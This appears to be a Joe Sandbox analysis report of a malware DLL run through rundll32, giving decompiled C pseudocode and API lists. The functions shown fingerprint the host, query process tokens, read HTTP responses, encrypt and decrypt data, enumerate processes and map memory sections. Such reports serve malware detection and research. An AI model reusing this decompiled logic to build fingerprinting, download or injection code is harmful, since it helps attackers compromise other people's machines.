                                0x00000000
                                0x010660f3
                                0x010660f7
                                0x010660fd
                                0x01066102
                                0x01066119
                                0x00000000
                                0x00000000
                                0x00000000
                                0x01066102
                                0x01066079
                                0x01066132
                                0x01066135
                                0x01066135
                                0x0106614a
                                0x0106614a
                                0x01066162

                                APIs
                                • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,010624D8,00000001,010658D7,00000000), ref: 01065FF3
                                • memcpy.NTDLL(010624D8,010658D7,00000010,?,?,?,010624D8,00000001,010658D7,00000000,?,01061D97,00000000,010658D7,?,7477C740), ref: 0106600C
                                • CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 01066035
                                • CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 0106604D
                                • memcpy.NTDLL(00000000,7477C740,051095B0,00000010), ref: 0106609F
                                • CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,051095B0,00000020,?,?,00000010), ref: 010660C8
                                • CryptDecrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,051095B0,?,?,00000010), ref: 010660DF
                                • GetLastError.KERNEL32(?,?,00000010), ref: 010660F7
                                • GetLastError.KERNEL32 ref: 01066129
                                • CryptDestroyKey.ADVAPI32(00000000), ref: 01066135
                                • GetLastError.KERNEL32 ref: 0106613D
                                • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0106614A
                                • GetLastError.KERNEL32(?,?,?,010624D8,00000001,010658D7,00000000,?,01061D97,00000000,010658D7,?,7477C740,010658D7,00000000,051095B0), ref: 01066152
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDecryptDestroyEncryptImportParamRelease
                                • String ID:
                                • API String ID: 1967744295-0
                                • Opcode ID: 28925f22f6bb84c4749bbf971da14160459fca69abb03241f6ccd661b84b3e12
                                • Instruction ID: 433a112b88bff473f7f31d360036889280f00186b99838359dde412022c3627b
                                • Opcode Fuzzy Hash: 28925f22f6bb84c4749bbf971da14160459fca69abb03241f6ccd661b84b3e12
                                • Instruction Fuzzy Hash: 98514BB1900209FFEB209FA8DC84AAEBBBDFB04354F048469F945E7250D7369A54DB61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 181 1063365-1063379 182 1063383-1063395 call 1062119 181->182 183 106337b-1063380 181->183 186 1063397-10633a7 GetUserNameW 182->186 187 10633e9-10633f6 182->187 183->182 188 10633f8-106340f GetComputerNameW 186->188 189 10633a9-10633b9 RtlAllocateHeap 186->189 187->188 191 1063411-1063422 RtlAllocateHeap 188->191 192 106344d-1063471 188->192 189->188 190 10633bb-10633c8 GetUserNameW 189->190 193 10633ca-10633d6 call 106708d 190->193 194 10633d8-10633e7 HeapFree 190->194 191->192 195 1063424-106342d GetComputerNameW 191->195 193->194 194->188 197 106343e-1063447 HeapFree 195->197 198 106342f-106343b call 106708d 195->198 197->192 198->197
                                C-Code - Quality: 96%
                                			E01063365(char __eax, void* __esi) {
                                				long _v8;
                                				char _v12;
                                				signed int _v16;
                                				signed int _v20;
                                				signed int _v28;
                                				long _t34;
                                				signed int _t39;
                                				long _t50;
                                				char _t59;
                                				intOrPtr _t61;
                                				void* _t62;
                                				void* _t64;
                                				char _t65;
                                				intOrPtr* _t67;
                                				void* _t68;
                                				void* _t69;
                                
                                				_t69 = __esi;
                                				_t65 = __eax;
                                				_v8 = 0;
                                				_v12 = __eax;
                                				if(__eax == 0) {
                                					_t59 =  *0x106a310; // 0xd448b889
                                					_v12 = _t59;
                                				}
                                				_t64 = _t69;
                                				E01062119( &_v12, _t64);
                                				if(_t65 != 0) {
                                					 *_t69 =  *_t69 ^  *0x106a344 ^ 0x46d76429;
                                				} else {
                                					GetUserNameW(0,  &_v8); // executed
                                					_t50 = _v8;
                                					if(_t50 != 0) {
                                						_t62 = RtlAllocateHeap( *0x106a2d8, 0, _t50 + _t50);
                                						if(_t62 != 0) {
                                							if(GetUserNameW(_t62,  &_v8) != 0) {
                                								_t64 = _t62;
                                								 *_t69 =  *_t69 ^ E0106708D(_v8 + _v8, _t64);
                                							}
                                							HeapFree( *0x106a2d8, 0, _t62);
                                						}
                                					}
                                				}
                                				_t61 = __imp__;
                                				_v8 = _v8 & 0x00000000;
                                				GetComputerNameW(0,  &_v8);
                                				_t34 = _v8;
                                				if(_t34 != 0) {
                                					_t68 = RtlAllocateHeap( *0x106a2d8, 0, _t34 + _t34);
                                					if(_t68 != 0) {
                                						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                							_t64 = _t68;
                                							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E0106708D(_v8 + _v8, _t64);
                                						}
                                						HeapFree( *0x106a2d8, 0, _t68);
                                					}
                                				}
                                				asm("cpuid");
                                				_t67 =  &_v28;
                                				 *_t67 = 1;
                                				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                				 *((intOrPtr*)(_t67 + 8)) = 0;
                                				 *(_t67 + 0xc) = _t64;
                                				_t39 = _v16 ^ _v20 ^ _v28;
                                				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
                                				return _t39;
                                			}



















                                0x01063365
                                0x0106336d
                                0x01063371
                                0x01063374
                                0x01063379
                                0x0106337b
                                0x01063380
                                0x01063380
                                0x01063386
                                0x01063388
                                0x01063395
                                0x010633f6
                                0x01063397
                                0x0106339c
                                0x010633a2
                                0x010633a7
                                0x010633b5
                                0x010633b9
                                0x010633c8
                                0x010633cf
                                0x010633d6
                                0x010633d6
                                0x010633e1
                                0x010633e1
                                0x010633b9
                                0x010633a7
                                0x010633f8
                                0x010633fe
                                0x01063408
                                0x0106340a
                                0x0106340f
                                0x0106341e
                                0x01063422
                                0x0106342d
                                0x01063434
                                0x0106343b
                                0x0106343b
                                0x01063447
                                0x01063447
                                0x01063422
                                0x01063452
                                0x01063454
                                0x01063457
                                0x01063459
                                0x0106345c
                                0x0106345f
                                0x01063469
                                0x0106346d
                                0x01063471

                                APIs
                                • GetUserNameW.ADVAPI32(00000000,?), ref: 0106339C
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 010633B3
                                • GetUserNameW.ADVAPI32(00000000,?), ref: 010633C0
                                • HeapFree.KERNEL32(00000000,00000000), ref: 010633E1
                                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 01063408
                                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0106341C
                                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 01063429
                                • HeapFree.KERNEL32(00000000,00000000), ref: 01063447
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: HeapName$AllocateComputerFreeUser
                                • String ID:
                                • API String ID: 3239747167-0
                                • Opcode ID: 202bb59a0859d718d1fe996b66a38f8e785ac0975baaf03b6697aa41a06365d3
                                • Instruction ID: de11479f051e8f30db605aba79b6527e5574d2ac9dc609f0d88794179a9d6734
                                • Opcode Fuzzy Hash: 202bb59a0859d718d1fe996b66a38f8e785ac0975baaf03b6697aa41a06365d3
                                • Instruction Fuzzy Hash: B9314F71A00205EFEB21EFA9DC81B6EB7FDFF48204F508469E585E7221DB35E9019B60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 38%
                                			E01064321(char _a4, void* _a8) {
                                				void* _v8;
                                				void* _v12;
                                				char _v16;
                                				void* _v20;
                                				char _v24;
                                				char _v28;
                                				char _v32;
                                				char _v36;
                                				char _v40;
                                				void* _v44;
                                				void** _t33;
                                				void* _t40;
                                				void* _t43;
                                				void** _t44;
                                				intOrPtr* _t47;
                                				char _t48;
                                
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				_v20 = _a4;
                                				_t48 = 0;
                                				_v16 = 0;
                                				_a4 = 0;
                                				_v44 = 0x18;
                                				_v40 = 0;
                                				_v32 = 0;
                                				_v36 = 0;
                                				_v28 = 0;
                                				_v24 = 0;
                                				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                                					_t33 =  &_v8;
                                					__imp__(_v12, 8, _t33);
                                					if(_t33 >= 0) {
                                						_t47 = __imp__;
                                						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                                						_t44 = E01066D63(_a4);
                                						if(_t44 != 0) {
                                							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                                							if(_t40 >= 0) {
                                								memcpy(_a8,  *_t44, 0x1c);
                                								_t48 = 1;
                                							}
                                							E01066C2C(_t44);
                                						}
                                						NtClose(_v8); // executed
                                					}
                                					NtClose(_v12);
                                				}
                                				return _t48;
                                			}



















                                0x0106432e
                                0x0106432f
                                0x01064330
                                0x01064331
                                0x01064332
                                0x01064336
                                0x0106433d
                                0x0106434c
                                0x0106434f
                                0x01064352
                                0x01064359
                                0x0106435c
                                0x0106435f
                                0x01064362
                                0x01064365
                                0x01064370
                                0x01064372
                                0x0106437b
                                0x01064383
                                0x01064385
                                0x01064397
                                0x010643a1
                                0x010643a5
                                0x010643b4
                                0x010643b8
                                0x010643c1
                                0x010643c9
                                0x010643c9
                                0x010643cb
                                0x010643cb
                                0x010643d3
                                0x010643d9
                                0x010643dd
                                0x010643dd
                                0x010643e8

                                APIs
                                • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 01064368
                                • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 0106437B
                                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 01064397
                                  • Part of subcall function 01066D63: RtlAllocateHeap.NTDLL(00000000,00000000,01065D7B), ref: 01066D6F
                                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 010643B4
                                • memcpy.NTDLL(?,00000000,0000001C), ref: 010643C1
                                • NtClose.NTDLL(?), ref: 010643D3
                                • NtClose.NTDLL(00000000), ref: 010643DD
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                • String ID:
                                • API String ID: 2575439697-0
                                • Opcode ID: ee8065fc72b29930db8622a83c659bdb2b758489919ef0df093f68f5f435b4b9
                                • Instruction ID: de4cc78fe651c7e304b96bc0161511523daca59c98b1daf7aaf2223ff9f4225c
                                • Opcode Fuzzy Hash: ee8065fc72b29930db8622a83c659bdb2b758489919ef0df093f68f5f435b4b9
                                • Instruction Fuzzy Hash: 42212AB1900129BFDF11AF94CC84ADEBFBDFF08740F108012FA45E6120D7B29A449BA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 331 1061ca5-1061cac 332 1061cb7-10673b3 ResetEvent InternetReadFile 331->332 333 1061cae-1061cb5 call 1064a85 331->333 337 10673e4-10673e9 332->337 338 10673b5-10673c3 GetLastError 332->338 333->332 339 1061cbf-1061cc0 333->339 342 10673ef-10673fe 337->342 343 10674ac 337->343 340 10673c5-10673d3 call 1066e40 338->340 341 10673dc-10673de 338->341 345 10674af-10674b5 340->345 348 10673d9 340->348 341->337 341->345 349 10674a7-10674aa 342->349 350 1067404-1067413 call 1066d63 342->350 343->345 348->341 349->345 353 1067499-106749b 350->353 354 1067419-1067421 350->354 356 106749c-10674a1 353->356 355 1067422-1067447 ResetEvent InternetReadFile 354->355 359 1067470-1067475 355->359 360 1067449-1067457 GetLastError 355->360 358 10674a5 356->358 358->345 361 1067480-106748a call 1066c2c 359->361 363 1067477-106747e 359->363 360->361 362 1067459-1067467 call 1066e40 360->362 361->356 369 106748c-1067490 call 10615cc 361->369 362->361 368 1067469-106746e 362->368 363->355 368->359 368->361 371 1067495-1067497 369->371 371->356
                                C-Code - Quality: 71%
                                			E01061CA5(void* __eax, void* __ecx) {
                                				long _v8;
                                				void* _v12;
                                				void* _v16;
                                				void _v20;
                                				void* __esi;
                                				void* _t30;
                                				void* _t38;
                                				intOrPtr* _t39;
                                				intOrPtr* _t41;
                                				int _t45;
                                				long _t47;
                                				void* _t54;
                                				long _t64;
                                				void* _t67;
                                				void* _t69;
                                
                                				_t58 = __ecx;
                                				_t67 = __eax;
                                				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
                                					L2:
                                					_t30 = _t67;
                                					_pop(_t68);
                                					_t69 = _t30;
                                					_t64 = 0;
                                					ResetEvent( *(_t69 + 0x1c));
                                					if(InternetReadFile( *(_t69 + 0x18),  &_v20, 4,  &_v8) != 0) {
                                						L9:
                                						if(_v8 == 0) {
                                							 *((intOrPtr*)(_t69 + 0x30)) = 0;
                                						} else {
                                							 *0x106a174(0, 1,  &_v12); // executed
                                							if(0 != 0) {
                                								_t64 = 8;
                                							} else {
                                								_t38 = E01066D63(0x1000);
                                								_v16 = _t38;
                                								if(_t38 == 0) {
                                									_t64 = 8;
                                								} else {
                                									_push(0);
                                									_push(_v8);
                                									_push( &_v20);
                                									while(1) {
                                										_t41 = _v12;
                                										_t61 =  *_t41;
                                										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
                                										ResetEvent( *(_t69 + 0x1c));
                                										_t45 = InternetReadFile( *(_t69 + 0x18), _v16, 0x1000,  &_v8); // executed
                                										if(_t45 != 0) {
                                											goto L17;
                                										}
                                										_t64 = GetLastError();
                                										if(_t64 == 0x3e5) {
                                											_t64 = E01066E40( *(_t69 + 0x1c), _t61, 0xffffffff);
                                											if(_t64 == 0) {
                                												_t64 =  *((intOrPtr*)(_t69 + 0x28));
                                												if(_t64 == 0) {
                                													goto L17;
                                												}
                                											}
                                										}
                                										L19:
                                										E01066C2C(_v16);
                                										if(_t64 == 0) {
                                											_t47 = E010615CC(_v12, _t69); // executed
                                											_t64 = _t47;
                                										}
                                										goto L22;
                                										L17:
                                										_t64 = 0;
                                										if(_v8 != 0) {
                                											_push(0);
                                											_push(_v8);
                                											_push(_v16);
                                											continue;
                                										}
                                										goto L19;
                                									}
                                								}
                                								L22:
                                								_t39 = _v12;
                                								 *((intOrPtr*)( *_t39 + 8))(_t39);
                                							}
                                						}
                                					} else {
                                						_t64 = GetLastError();
                                						if(_t64 != 0x3e5) {
                                							L8:
                                							if(_t64 == 0) {
                                								goto L9;
                                							}
                                						} else {
                                							_t64 = E01066E40( *(_t69 + 0x1c), _t58, 0xffffffff);
                                							if(_t64 == 0) {
                                								_t64 =  *((intOrPtr*)(_t69 + 0x28));
                                								goto L8;
                                							}
                                						}
                                					}
                                					return _t64;
                                				} else {
                                					_t54 = E01064A85(__ecx, __eax);
                                					if(_t54 != 0) {
                                						return _t54;
                                					} else {
                                						goto L2;
                                					}
                                				}
                                			}


















                                0x01061ca5
                                0x01061ca6
                                0x01061cac
                                0x01061cb7
                                0x01061cb7
                                0x01061cb9
                                0x01067395
                                0x0106739a
                                0x0106739c
                                0x010673b3
                                0x010673e4
                                0x010673e9
                                0x010674ac
                                0x010673ef
                                0x010673f6
                                0x010673fe
                                0x010674a9
                                0x01067404
                                0x01067409
                                0x0106740e
                                0x01067413
                                0x0106749b
                                0x01067419
                                0x01067419
                                0x0106741b
                                0x01067421
                                0x01067422
                                0x01067422
                                0x01067425
                                0x01067428
                                0x0106742e
                                0x0106743f
                                0x01067447
                                0x00000000
                                0x00000000
                                0x0106744f
                                0x01067457
                                0x01067463
                                0x01067467
                                0x01067469
                                0x0106746e
                                0x00000000
                                0x00000000
                                0x0106746e
                                0x01067467
                                0x01067480
                                0x01067483
                                0x0106748a
                                0x01067490
                                0x01067495
                                0x01067495
                                0x00000000
                                0x01067470
                                0x01067470
                                0x01067475
                                0x01067477
                                0x01067478
                                0x0106747b
                                0x00000000
                                0x0106747b
                                0x00000000
                                0x01067475
                                0x01067422
                                0x0106749c
                                0x0106749c
                                0x010674a2
                                0x010674a2
                                0x010673fe
                                0x010673b5
                                0x010673bb
                                0x010673c3
                                0x010673dc
                                0x010673de
                                0x00000000
                                0x00000000
                                0x010673c5
                                0x010673cf
                                0x010673d3
                                0x010673d9
                                0x00000000
                                0x010673d9
                                0x010673d3
                                0x010673c3
                                0x010674b5
                                0x01061cae
                                0x01061cae
                                0x01061cb5
                                0x01061cc0
                                0x00000000
                                0x00000000
                                0x00000000
                                0x01061cb5

                                APIs
                                • ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,76DC81D0,00000000,00000000), ref: 0106739C
                                • InternetReadFile.WININET(?,?,00000004,?), ref: 010673AB
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,0106593D,00000000,?,?), ref: 010673B5
                                • ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,0106593D,00000000,?), ref: 0106742E
                                • InternetReadFile.WININET(?,?,00001000,?), ref: 0106743F
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,0106593D,00000000,?,?), ref: 01067449
                                  • Part of subcall function 01064A85: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,76DC81D0,00000000,00000000), ref: 01064A9C
                                  • Part of subcall function 01064A85: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,0106593D,00000000,?), ref: 01064AAC
                                  • Part of subcall function 01064A85: HttpQueryInfoA.WININET(?,20000013,?,?), ref: 01064ADE
                                  • Part of subcall function 01064A85: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 01064B03
                                  • Part of subcall function 01064A85: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 01064B23
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: EventHttpInfoQuery$ErrorFileInternetLastReadReset$ObjectSingleWait
                                • String ID:
                                • API String ID: 2393427839-0
                                • Opcode ID: c9de117296791662464c5cc2bd96232394c86a85c41647a397f3b16d44902f04
                                • Instruction ID: f733cb1b4c63f172c998abbd97da7ed7cdb00e440c645c7ce0f4bd0cb1d68c5c
                                • Opcode Fuzzy Hash: c9de117296791662464c5cc2bd96232394c86a85c41647a397f3b16d44902f04
                                • Instruction Fuzzy Hash: 4F411832600204EFDB22ABA8CC48BAF7BFDAF84368F114564E5C1D7150DF31E9018B50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 65%
                                			E01064B89(void* __ecx, intOrPtr _a4) {
                                				struct _FILETIME _v12;
                                				int _t13;
                                				signed int _t16;
                                				void* _t18;
                                				signed int _t19;
                                				unsigned int _t23;
                                				void* _t30;
                                				signed int _t34;
                                
                                				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
                                				asm("stosd");
                                				do {
                                					_t13 = SwitchToThread();
                                					GetSystemTimeAsFileTime( &_v12);
                                					_t23 = _v12.dwHighDateTime;
                                					_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5;
                                					_push(0);
                                					_push(0x13);
                                					_push(_t23 >> 5);
                                					_push(_t16);
                                					L010683A6();
                                					_t34 = _t16 + _t13;
                                					_t18 = E01065D2E(_a4, _t34);
                                					_t30 = _t18;
                                					_t19 = 3;
                                					Sleep(_t19 << (_t34 & 0x00000007)); // executed
                                				} while (_t30 == 1);
                                				return _t30;
                                			}











                                0x01064b8e
                                0x01064b99
                                0x01064b9a
                                0x01064b9a
                                0x01064ba6
                                0x01064baf
                                0x01064bb2
                                0x01064bb6
                                0x01064bb8
                                0x01064bbd
                                0x01064bbe
                                0x01064bbf
                                0x01064bc9
                                0x01064bcc
                                0x01064bd3
                                0x01064bd7
                                0x01064bde
                                0x01064be4
                                0x01064bee

                                APIs
                                • SwitchToThread.KERNEL32(?,00000001,?,?,?,01061D14,?,?), ref: 01064B9A
                                • GetSystemTimeAsFileTime.KERNEL32(00000000,?,00000001,?,?,?,01061D14,?,?), ref: 01064BA6
                                • _aullrem.NTDLL(00000000,?,00000013,00000000), ref: 01064BBF
                                  • Part of subcall function 01065D2E: memcpy.NTDLL(00000000,00000000,?,?,00000000,?,?,?,00000000), ref: 01065D8D
                                • Sleep.KERNEL32(00000003,00000000,?,00000001,?,?,?,01061D14,?,?), ref: 01064BDE
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: Time$FileSleepSwitchSystemThread_aullremmemcpy
                                • String ID:
                                • API String ID: 1610602887-0
                                • Opcode ID: e58f1fe7bd06290418d47c92a4243f2880394dc007dc92a8a6bf269bd4b91744
                                • Instruction ID: fc1f1a4a8f96d9dc7410f30a04ca8e002f3828408733d569358121dd792cbfb3
                                • Opcode Fuzzy Hash: e58f1fe7bd06290418d47c92a4243f2880394dc007dc92a8a6bf269bd4b91744
                                • Instruction Fuzzy Hash: FCF0AF77A002087FE7249BA8CC1EFDE76BDDB84355F000124F602E7240E6B89A008BA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 68%
                                			E010668BD() {
                                				char _v264;
                                				void* _v300;
                                				void* _t5;
                                				int _t8;
                                				intOrPtr _t9;
                                				int _t15;
                                				void* _t17;
                                
                                				_t15 = 0;
                                				_t5 = CreateToolhelp32Snapshot(2, 0); // executed
                                				_t17 = _t5;
                                				if(_t17 != 0) {
                                					_t8 = Process32First(_t17,  &_v300);
                                					while(_t8 != 0) {
                                						_t9 =  *0x106a348; // 0x409d5a8
                                						_t2 = _t9 + 0x106beb0; // 0x73617661
                                						_push( &_v264);
                                						if( *0x106a12c() != 0) {
                                							_t15 = 1;
                                						} else {
                                							_t8 = Process32Next(_t17,  &_v300);
                                							continue;
                                						}
                                						L7:
                                						FindCloseChangeNotification(_t17); // executed
                                						goto L8;
                                					}
                                					goto L7;
                                				}
                                				L8:
                                				return _t15;
                                			}










                                0x010668c8
                                0x010668cd
                                0x010668d2
                                0x010668d6
                                0x010668e0
                                0x01066911
                                0x010668e7
                                0x010668ec
                                0x010668f9
                                0x01066902
                                0x01066919
                                0x01066904
                                0x0106690c
                                0x00000000
                                0x0106690c
                                0x0106691a
                                0x0106691b
                                0x00000000
                                0x0106691b
                                0x00000000
                                0x01066915
                                0x01066921
                                0x01066926

                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 010668CD
                                • Process32First.KERNEL32(00000000,?), ref: 010668E0
                                • Process32Next.KERNEL32(00000000,?), ref: 0106690C
                                • FindCloseChangeNotification.KERNEL32(00000000), ref: 0106691B
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                                • String ID:
                                • API String ID: 3243318325-0
                                • Opcode ID: 9b834838e133fbcfc580dbfef3f546ba5f35641bb0aaaf3fae5b8ebaba2b7860
                                • Instruction ID: ac1c9dae259f47501bc27f995bef4c0329943b3ad067168a09b4fb5d024a4cc1
                                • Opcode Fuzzy Hash: 9b834838e133fbcfc580dbfef3f546ba5f35641bb0aaaf3fae5b8ebaba2b7860
                                • Instruction Fuzzy Hash: 56F0907220012AABD720A6768C08EEB77ACDBD6314F0000A1EEC5D3004EA36EA4987B1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 72%
                                			E0106190C(intOrPtr* __eax, void** _a4) {
                                				int _v12;
                                				void* _v16;
                                				void* _v20;
                                				void* _v24;
                                				int _v28;
                                				int _v32;
                                				intOrPtr _v36;
                                				int _v40;
                                				int _v44;
                                				void* _v48;
                                				void* __esi;
                                				long _t34;
                                				void* _t39;
                                				void* _t47;
                                				intOrPtr* _t48;
                                
                                				_t48 = __eax;
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				_v24 =  *((intOrPtr*)(__eax + 4));
                                				_v16 = 0;
                                				_v12 = 0;
                                				_v48 = 0x18;
                                				_v44 = 0;
                                				_v36 = 0x40;
                                				_v40 = 0;
                                				_v32 = 0;
                                				_v28 = 0;
                                				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                                				if(_t34 < 0) {
                                					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                                				} else {
                                					 *_t48 = _v16;
                                					_t39 = E01066D0A(_t48,  &_v12); // executed
                                					_t47 = _t39;
                                					if(_t47 != 0) {
                                						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                                					} else {
                                						memset(_v12, 0, _v24);
                                						 *_a4 = _v12;
                                					}
                                				}
                                				return _t47;
                                			}


















                                0x01061915
                                0x0106191c
                                0x0106191d
                                0x0106191e
                                0x0106191f
                                0x01061920
                                0x01061931
                                0x01061935
                                0x01061949
                                0x0106194c
                                0x0106194f
                                0x01061956
                                0x01061959
                                0x01061960
                                0x01061963
                                0x01061966
                                0x01061969
                                0x0106196e
                                0x010619a9
                                0x01061970
                                0x01061973
                                0x01061979
                                0x0106197e
                                0x01061982
                                0x010619a0
                                0x01061984
                                0x0106198b
                                0x01061999
                                0x01061999
                                0x01061982
                                0x010619b1

                                APIs
                                • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76D84EE0,00000000,00000000,0106459D), ref: 01061969
                                  • Part of subcall function 01066D0A: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,0106197E,00000002,00000000,?,?,00000000,?,?,0106197E,00000000), ref: 01066D37
                                • memset.NTDLL ref: 0106198B
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
